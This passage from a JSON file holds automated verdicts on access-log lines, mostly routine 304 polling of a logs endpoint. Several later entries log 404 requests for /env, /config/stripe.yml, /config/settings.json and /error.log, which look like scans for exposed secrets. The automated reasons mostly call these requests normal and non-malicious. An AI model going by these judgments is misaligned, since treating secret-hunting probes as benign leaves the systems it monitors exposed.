"536c676b179750b27a06dda9cf48563179b0748c76c5964217860643aa0df3fe", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.376 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:43:12.748548752Z" }, "537ed7a87e5540f9ae3bc67d03b953959867f2632ba733f54b13e0462f990106": { "type": "hash", "value": "537ed7a87e5540f9ae3bc67d03b953959867f2632ba733f54b13e0462f990106", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (not modified) is typical read/caching behavior; response time is normal.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.834 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:00.744516755Z" }, "54af19bb0289bbc52c502171014c22ef5b91b8378a076fee54a32a3d015b66fa": { "type": "hash", "value": "54af19bb0289bbc52c502171014c22ef5b91b8378a076fee54a32a3d015b66fa", "source": "auto", "reason": "Routine HTTP GET request to an internal API endpoint returning 304 (not modified) with reasonable latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.888 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:48.891189253Z" }, "557c36651c50c1c47b7da1681399b515e7cb40690eadc028acfe829c4769cad8": { "type": "hash", "value": "557c36651c50c1c47b7da1681399b515e7cb40690eadc028acfe829c4769cad8", "source": "auto", "reason": "Appears to be a routine HTTP GET request to an application logs endpoint returning 304 (not modified), with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 29.288 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:06.744250685Z" }, "568c6056dada3438b90b4294b560875fdfc3266870f954e1722c9caf0238e87e": { "type": "hash", "value": "568c6056dada3438b90b4294b560875fdfc3266870f954e1722c9caf0238e87e", "source": "auto", "reason": "Routine HTTP GET to application logs endpoint with a 304 response code and normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.280 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:30.792140848Z" }, "56dd499d5c515a688de3f8f2f9460044bd6dbed77d15a6bea297295e66d21e67": { "type": "hash", "value": "56dd499d5c515a688de3f8f2f9460044bd6dbed77d15a6bea297295e66d21e67", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint with a 304 status and normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.726 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:27.759434597Z" }, "56dfa3d59036414e853edddd24e33b2226bf4766cf90788f409be31919b1e5ed": { "type": "hash", "value": "56dfa3d59036414e853edddd24e33b2226bf4766cf90788f409be31919b1e5ed", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application API endpoint with a 304 status and normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.713 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:15.813425631Z" }, "5a1ec82d92eccb703c9961eb560f43139f19c97862f07dbaa55fa0ddf5d4c766": { "type": "hash", "value": "5a1ec82d92eccb703c9961eb560f43139f19c97862f07dbaa55fa0ddf5d4c766", "source": "auto", "reason": "Looks like a routine HTTP GET to an application API endpoint with a normal 304 response and sub-minute latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.862 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:33.829565799Z" }, "5b345fd3a3fb0ad7720f4f268628cfee8d07871109665cce1914a8471504ab88": { "type": "hash", "value": "5b345fd3a3fb0ad7720f4f268628cfee8d07871109665cce1914a8471504ab88", "source": "auto", "reason": "Normal HTTP access log showing a 404 for /error.log; standard web server behavior.", "original_line": "\u001b[0mGET /error.log \u001b[33m404\u001b[\u003cDUR\u003e 0.577 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:35:15.771298035Z" }, "5b8bd7196a67d471bfdede240519310351093d9c04fb518f6230ff68529a980f": { "type": "hash", "value": "5b8bd7196a67d471bfdede240519310351093d9c04fb518f6230ff68529a980f", "source": "auto", "reason": "Appears to be a normal HTTP GET to an app logs endpoint returning 304 (not modified) with a short latency; no explicit error or attack indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.162 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:09.706782435Z" }, "5c0810e831cff947acfa50e444ea3b9e53bead1937de55cc4d9bc94a3065ba35": { "type": "hash", "value": "5c0810e831cff947acfa50e444ea3b9e53bead1937de55cc4d9bc94a3065ba35", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application logs endpoint with a 304 status and a measured latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.262 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:30.939380862Z" }, "5c369d378dc540b5e22096b1beebc1d4e35621aac275ae9ccf0b6cdaa2ebcfea": { "type": "hash", "value": "5c369d378dc540b5e22096b1beebc1d4e35621aac275ae9ccf0b6cdaa2ebcfea", "source": "auto", "reason": "Docker service access log shows a normal HTTP GET request to an application API with a 304 status and typical response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 18.953 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:12.730096941Z" }, "5d563c5304a2af9ac335de37eeb904909ee86f4e9d2191d318f865345cd27d57": { "type": "hash", "value": "5d563c5304a2af9ac335de37eeb904909ee86f4e9d2191d318f865345cd27d57", "source": "auto", "reason": "Routine HTTP GET to an API endpoint returning 304 (not modified), with a typical response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.838 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:09.815630603Z" }, "5d6e2e211615d6b931795ef72158b139259a13f63db9ddf8febfd492153a1407": { "type": "hash", "value": "5d6e2e211615d6b931795ef72158b139259a13f63db9ddf8febfd492153a1407", "source": "auto", "reason": "Regular HTTP GET to application logs endpoint returning 304 (not modified) with a measured latency; appears like normal client polling/caching.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.802 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:39.73897254Z" }, "5e19b282454af3323735d24fe3030ce4044adb87c9e8831bc81019df37e2dc8b": { "type": "hash", "value": "5e19b282454af3323735d24fe3030ce4044adb87c9e8831bc81019df37e2dc8b", "source": "auto", "reason": "Normal HTTP 404 response for a GET request to a common endpoint; no malicious indicators observed.", "original_line": "\u001b[0mGET /register \u001b[33m404\u001b[\u003cDUR\u003e 0.527 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:55.682207118Z" }, "5f07255c87352351ad356437f58369c96c1a4d54ac9bf64b5a8eedd024bb2ef4": { "type": "hash", "value": "5f07255c87352351ad356437f58369c96c1a4d54ac9bf64b5a8eedd024bb2ef4", "source": "auto", "reason": "HTTP GET to an application log endpoint returning 304 (not modified) with a normal response time; looks like routine client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.320 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:57.945274563Z" }, "5f46a6972d26e053c37dd04a6a71d52604098dd09e84059b7c35fbd58459193d": { "type": "hash", "value": "5f46a6972d26e053c37dd04a6a71d52604098dd09e84059b7c35fbd58459193d", "source": "auto", "reason": "Normal HTTP access log entry with typical status code and latency; no anomalies detected.", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.662 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T13:27:41.986514407Z" }, "60348d95b0d685c8d6a98a8688496020581adf55111ebe5ef653f174ea477988": { "type": "hash", "value": "60348d95b0d685c8d6a98a8688496020581adf55111ebe5ef653f174ea477988", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 (not modified) with a small response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.135 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:36.789327803Z" }, "61797e5dfb011becfe6bd0447e9ca72d4237cfbc93b5cabed410b32ed1cef78e": { "type": "hash", "value": "61797e5dfb011becfe6bd0447e9ca72d4237cfbc93b5cabed410b32ed1cef78e", "source": "auto", "reason": "HTTP GET request to a logs endpoint returned 304 (not modified) with a normal latency; likely routine client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.209 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:55.100958097Z" }, "621affd875e17e96f6018e486e12a9e47ad8d2ca3cc5aafe99817a147ad7acf1": { "type": "hash", "value": "621affd875e17e96f6018e486e12a9e47ad8d2ca3cc5aafe99817a147ad7acf1", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint with a 304 response (not an error) and a normal duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.530 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:18.950148842Z" }, "6227c103326b3e54d406ca906915f86e8652f648c3d812010e945bfa8cadc6ec": { "type": "hash", "value": "6227c103326b3e54d406ca906915f86e8652f648c3d812010e945bfa8cadc6ec", "source": "auto", "reason": "HTTP GET to an application log endpoint returned 304 (not modified), consistent with normal polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.880 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:15.853375564Z" }, "626d033590878440c925c9b6c35a4c0f1a29db6dd620105421b4d8a8e4131492": { "type": "hash", "value": "626d033590878440c925c9b6c35a4c0f1a29db6dd620105421b4d8a8e4131492", "source": "auto", "reason": "Normal HTTP access log showing a successful GET request (status 200) with a small response time.", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.587 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:09.131285828Z" }, "62844c0ae3182dafaf8332ab0aaab8c17f62f6b4a3e5dc5d37dd17bad51b888f": { "type": "hash", "value": "62844c0ae3182dafaf8332ab0aaab8c17f62f6b4a3e5dc5d37dd17bad51b888f", "source": "auto", "reason": "404 on a static config path is a common, non-malicious request and typical web server behavior.", "original_line": "\u001b[0mGET /config/stripe.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.737 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:27.179345857Z" }, "62b325f82c7a3fcd8e9c60fb6aaab5a1da114c46e3184a84c3693e98084e3148": { "type": "hash", "value": "62b325f82c7a3fcd8e9c60fb6aaab5a1da114c46e3184a84c3693e98084e3148", "source": "auto", "reason": "Regular HTTP GET to an application logs endpoint returning 304 (not modified) with a typical sub-100ms latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.594 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:21.71063701Z" }, "63273aac39578d2f43c950e5746f3494a26900b67c6eb5392d3706620ea60b51": { "type": "hash", "value": "63273aac39578d2f43c950e5746f3494a26900b67c6eb5392d3706620ea60b51", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (Not Modified); duration is within normal request timing.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 35.873 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:54.802365845Z" }, "653fb4742d865a4c6779572dbacbf5d124fbcf13552b890bdb4a332f782b4f5b": { "type": "hash", "value": "653fb4742d865a4c6779572dbacbf5d124fbcf13552b890bdb4a332f782b4f5b", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a small response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.024 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:39.746603285Z" }, "661638ab576d58b0889ae3751696a6c04f4f5ced857dfb8c81d52b6d4a65aa9e": { "type": "hash", "value": "661638ab576d58b0889ae3751696a6c04f4f5ced857dfb8c81d52b6d4a65aa9e", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint with a 304 response; no obvious attack indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.411 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:21.880061088Z" }, "66cb9837d237a88e7318a06c49e210ce782ed41a6b48ebe92a8ed1407875efa7": { "type": "hash", "value": "66cb9837d237a88e7318a06c49e210ce782ed41a6b48ebe92a8ed1407875efa7", "source": "auto", "reason": "Looks like a normal HTTP GET request returning 304 (not modified) with a measured response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.232 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:15.864507193Z" }, "671bfef60eed5bf2dedafd1acbf68eeb199639bec3876e8321a4cc5779f53582": { "type": "hash", "value": "671bfef60eed5bf2dedafd1acbf68eeb199639bec3876e8321a4cc5779f53582", "source": "auto", "reason": "HTTP GET request to an application API endpoint returning 304 (not modified) with a normal sub-50ms duration; appears routine.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.016 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:48.867626672Z" }, "6793885d0f15d3224ff3f23d013669684286f6583e3d60d2d3401fd03086b5c8": { "type": "hash", "value": "6793885d0f15d3224ff3f23d013669684286f6583e3d60d2d3401fd03086b5c8", "source": "auto", "reason": "Regular HTTP GET to /api/stripe/config returning 200 status in a Docker-hosted service; no anomalies detected.", "original_line": "\u001b[0mGET /api/stripe/config \u001b[32m200\u001b[\u003cDUR\u003e 0.527 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:52.230343657Z" }, "68859202a117a0d257be813cf13435ce66179c83e04f9f17e08fe4ef8693ad0b": { "type": "hash", "value": "68859202a117a0d257be813cf13435ce66179c83e04f9f17e08fe4ef8693ad0b", "source": "auto", "reason": "Looks like a routine HTTP GET request from an API endpoint returning 304 (not modified); typical access log formatting with request duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.669 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:57.771744367Z" }, "694e281a9c1143e8443051aaa8b88de8ea29a30d2b5f61f6b212bcfdcf113d86": { "type": "hash", "value": "694e281a9c1143e8443051aaa8b88de8ea29a30d2b5f61f6b212bcfdcf113d86", "source": "auto", "reason": "Routine HTTP GET request to an internal API endpoint returning 304 (Not Modified) with normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.711 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:45.83655409Z" }, "6983ac92814189bff0c02d9ccbac356842d44e05fb8812691c69c8b7e4878cb1": { "type": "hash", "value": "6983ac92814189bff0c02d9ccbac356842d44e05fb8812691c69c8b7e4878cb1", "source": "auto", "reason": "Regular HTTP GET to an application logs API with a successful 304 status; latency is reported normally.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.359 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:33.707652338Z" }, "69c3417c30958fd4ce73550adec1c838a3c88f924f12e35e288c38c2f4278fe1": { "type": "hash", "value": "69c3417c30958fd4ce73550adec1c838a3c88f924f12e35e288c38c2f4278fe1", "source": "auto", "reason": "Looks like a routine authenticated web request to an API logs endpoint returning HTTP 304 (not modified).", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.286 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:54.728100011Z" }, "6ba3d1438fca8985802e6cfebfdf7ab100496da315c0d9ca7859e204e18caa74": { "type": "hash", "value": "6ba3d1438fca8985802e6cfebfdf7ab100496da315c0d9ca7859e204e18caa74", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 Not Modified; typical of normal client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.608 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:42.79070173Z" }, "6c2f5b0ed12834e59915b48c3e7d362fa133d074dc119d099ba7993306fe2193": { "type": "hash", "value": "6c2f5b0ed12834e59915b48c3e7d362fa133d074dc119d099ba7993306fe2193", "source": "auto", "reason": "HTTP GET to a versioned API endpoint returning 304 (not modified) with a normal sub-50ms latency; typical caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.496 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:54.653809472Z" }, "6c5dbf7ee1f31322801a98dc7bfea7c457cfc342a800f47bd285535721a4c98e": { "type": "hash", "value": "6c5dbf7ee1f31322801a98dc7bfea7c457cfc342a800f47bd285535721a4c98e", "source": "auto", "reason": "Routine HTTP GET request to application logs endpoint returning 304 (not modified); typical for log viewer polling/caching.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.515 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:48.856583066Z" }, "6cd50763feb684d2d6802ef1ee212ffaf145216e88ed00043ffe3a4921972f89": { "type": "hash", "value": "6cd50763feb684d2d6802ef1ee212ffaf145216e88ed00043ffe3a4921972f89", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified), with normal timing format typical of web access logs.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.966 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:30.783430359Z" }, "6eadc7f4afdcc653d72584fc64b76e279677ea3d32394906932fc1cc2a2de26e": { "type": "hash", "value": "6eadc7f4afdcc653d72584fc64b76e279677ea3d32394906932fc1cc2a2de26e", "source": "auto", "reason": "Normal HTTP request to a path that returned 404; no sign of exploitation or abnormal behavior.", "original_line": "\u001b[0mGET /cart \u001b[33m404\u001b[\u003cDUR\u003e 0.626 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:15.873726346Z" }, "6ed515afeeb10b19f9f9185b00e45010345cbdf7fdeaa0e2bd5db0d051f0d3a2": { "type": "hash", "value": "6ed515afeeb10b19f9f9185b00e45010345cbdf7fdeaa0e2bd5db0d051f0d3a2", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.053 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:12.78517906Z" }, "6ee51053fc2866764de788eba6922fb59aef35ed49857e766164822092e16e39": { "type": "hash", "value": "6ee51053fc2866764de788eba6922fb59aef35ed49857e766164822092e16e39", "source": "auto", "reason": "HTTP GET request to an application logs endpoint returning 304 (not modified) with a normal latency; appears routine for clients refreshing cached resources.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.046 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:54.945029867Z" }, "6f592362fbc762caaa64f9e8d23623ada8033220bcc1dab5717576667749dc40": { "type": "hash", "value": "6f592362fbc762caaa64f9e8d23623ada8033220bcc1dab5717576667749dc40", "source": "auto", "reason": "Looks like a routine HTTP GET to an API endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 25.434 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:24:45.926305991Z" }, "6f5e535c6a350432b34f6f16160f4ba7c400fb19106ce037c99a4f94b40fac9d": { "type": "hash", "value": "6f5e535c6a350432b34f6f16160f4ba7c400fb19106ce037c99a4f94b40fac9d", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint returning HTTP 304 (not modified).", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.428 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:09.555088983Z" }, "6fcb9e9468823ad77a2a413a12cee52942246afc6082806e3946c0f1eac2c34b": { "type": "hash", "value": "6fcb9e9468823ad77a2a413a12cee52942246afc6082806e3946c0f1eac2c34b", "source": "auto", "reason": "Docker app access log showing an HTTP GET that returned 304 (not modified) with a short duration; looks like normal API polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.095 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:51.907986872Z" }, "6fdb1866a6307f6cda0b534051730cd69e37c62dad111a7285e99d2209f88a96": { "type": "hash", "value": "6fdb1866a6307f6cda0b534051730cd69e37c62dad111a7285e99d2209f88a96", "source": "auto", "reason": "Standard HTTP 200 response to a GET request for a static API endpoint; normal operational log", "original_line": "\u001b[0mGET /api/settings.map \u001b[32m200\u001b[\u003cDUR\u003e 0.860 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:22.625546691Z" }, "70e81874ed248e1709e5a6db71a829a828e77bc323f230d0ab8851647568f488": { "type": "hash", "value": "70e81874ed248e1709e5a6db71a829a828e77bc323f230d0ab8851647568f488", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.469 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:21.795936065Z" }, "70f33d06ecd23503aa71775cf422e187da086c3020b9f425e81202e906876aa1": { "type": "hash", "value": "70f33d06ecd23503aa71775cf422e187da086c3020b9f425e81202e906876aa1", "source": "auto", "reason": "Docker/container access log shows a successful HTTP GET returning 304 (not modified) with a small latency; looks like normal API polling/cache validation.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.016 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:24.717541512Z" }, "7183415753637148985c7ded85c6381168d916780a36b11ac5740da4b6f8e879": { "type": "hash", "value": "7183415753637148985c7ded85c6381168d916780a36b11ac5740da4b6f8e879", "source": "auto", "reason": "Normal HTTP GET for a static asset returning 404; not indicative of malicious activity.", "original_line": "\u001b[0mGET /.vite/manifest.json \u001b[33m404\u001b[\u003cDUR\u003e 0.667 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:43.531993997Z" }, "71f356ad50be3149484f1e014178d6ef5d61cb392fa746ddcc30f88baaaab345": { "type": "hash", "value": "71f356ad50be3149484f1e014178d6ef5d61cb392fa746ddcc30f88baaaab345", "source": "auto", "reason": "Looks like a routine HTTP GET to an internal API endpoint returning status 304 (not modified) with typical latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.203 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:21.693309616Z" }, "727fd67af0c316225e61c52cd523ba0f4d93f36497b0dc520716fafa42a9e0e8": { "type": "hash", "value": "727fd67af0c316225e61c52cd523ba0f4d93f36497b0dc520716fafa42a9e0e8", "source": "auto", "reason": "Normal HTTP GET request returning 404 for a static config path; not indicative of attack or misbehavior", "original_line": "\u001b[0mGET /config/settings.json \u001b[33m404\u001b[\u003cDUR\u003e 0.534 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:02.655537539Z" }, "75183350203ce3d2d3c5a98f3174840a9345ec6f36555473b3096e8b64838090": { "type": "hash", "value": "75183350203ce3d2d3c5a98f3174840a9345ec6f36555473b3096e8b64838090", "source": "auto", "reason": "Looks like a routine HTTP GET to an internal API returning 304 (not modified) with a response time; no auth failures or exploit indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.604 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:36.743962204Z" }, "75e3fa9f0d992a1e4aedb5986f1bc3d9d92ea1cfdb2ecf525b1e67f81b09739e": { "type": "hash", "value": "75e3fa9f0d992a1e4aedb5986f1bc3d9d92ea1cfdb2ecf525b1e67f81b09739e", "source": "auto", "reason": "Looks like a normal HTTP request to an internal API endpoint with a 304 response code and non-error latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 35.788 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:21.865660026Z" }, "763665ddedb7b13c51df831047e492a2e625b9f53b9b3f4ca8c9c72a842f5f30": { "type": "hash", "value": "763665ddedb7b13c51df831047e492a2e625b9f53b9b3f4ca8c9c72a842f5f30", "source": "auto", "reason": "Routine HTTP GET to an app logs endpoint returning 304 (not modified); looks like normal application polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.498 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:39.674886974Z" }, "7740ac9704aa16dc9ac2e5c3b09f76144428fa412ce21d9d6c68937488f73cf9": { "type": "hash", "value": "7740ac9704aa16dc9ac2e5c3b09f76144428fa412ce21d9d6c68937488f73cf9", "source": "auto", "reason": "Regular HTTP request to /env returning 404. May indicate probing or misconfigured route, but not clearly malicious.", "original_line": "\u001b[0mGET /env \u001b[33m404\u001b[\u003cDUR\u003e 0.636 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:23.411711441Z" }, "778a61e306d1de90881878f649758f58bfbd6a68e1d57ebfa5a1160dbcea82cb": { "type": "hash", "value": "778a61e306d1de90881878f649758f58bfbd6a68e1d57ebfa5a1160dbcea82cb", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (Not Modified) with normal sub-second latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.190 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:09.581655066Z" }, "7834fcffac7616b6d3cf2781a48a3fb9013307759e933dce455bc971d80423a4": { "type": "hash", "value": "7834fcffac7616b6d3cf2781a48a3fb9013307759e933dce455bc971d80423a4", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint returning 304 (not modified), with an ordinary latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.907 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:30.713237566Z" }, "78434c9e6d50326e2f502a79488c77f1b4b7d07198d19d251ae83244644d99c8": { "type": "hash", "value": "78434c9e6d50326e2f502a79488c77f1b4b7d07198d19d251ae83244644d99c8", "source": "auto", "reason": "Appears to be a routine HTTP GET request to an application logging endpoint returning 304 (not modified) with a normal latency value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.386 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:15.811117515Z" }, "795eb43c729453590c4e2fbeb6f6d72d12c82c3b2edc400937b62746e61f8fa3": { "type": "hash", "value": "795eb43c729453590c4e2fbeb6f6d72d12c82c3b2edc400937b62746e61f8fa3", "source": "auto", "reason": "Standard static asset request returning 404 is common and not indicative of misuse; no anomalies detected beyond a normal not-found response.", "original_line": 